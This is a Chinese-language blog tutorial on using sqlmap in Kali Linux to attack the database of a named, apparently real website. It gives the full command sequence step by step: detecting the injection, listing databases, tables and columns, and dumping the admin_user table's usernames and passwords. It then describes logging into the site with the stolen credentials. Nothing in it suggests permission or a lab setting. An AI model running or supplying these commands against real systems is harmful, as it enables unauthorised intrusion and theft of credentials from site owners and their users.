如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器

        题外话:这里添加一个通过域名获取IP的命令

         如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第1张图片

        Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持,基于Python环境。它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处理潜在的文件系统以及通过带外数据连接执行系统命令等。

       准备条件:攻击目标,我这里选择http://www.tunesoman.com/product.php?id=200。

       第一步:检测注入 sqlmap -u http://tunesoman.com/product.php?id=200

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第2张图片

   一直回车即可,最后可检测出版本

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第3张图片

      第二步:检测该IP有哪些数据库 sqlmap -u http://www.tunesoman.com/product.php?id=200 --dbs

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第4张图片

   此时显示出所有的数据库

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第5张图片

 第三步:检测出数据库之后,开始获取它里面的表 (batch的意思是不用一直yes,直接运行到底)

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第6张图片

 这时就检测出来了

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第7张图片

第四步:我们来检测一下admin_user表里有哪些字段。(--column列出字段 ,-T后面+表名,-D后面+数据库名)

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第8张图片

 

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第9张图片

第五步:这时我们就可以查出这些字段内有什么数据(-C查看字段,--dump是把所有的记录列出来)

sqlmap -u http://www.tunesoman.com/product.php?id=200 -C admin_user_name,admin_user_pass -T admin_user -D db363851433 --batch --dump

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第10张图片

此时我们就获取到了所有的数据了,里面包含用户名和密码,这时我们就可以进去它的服务器了

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第11张图片

最后:输入用户名和密码,进入服务器。

如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器_第12张图片

 

你可能感兴趣的:(渗透测试)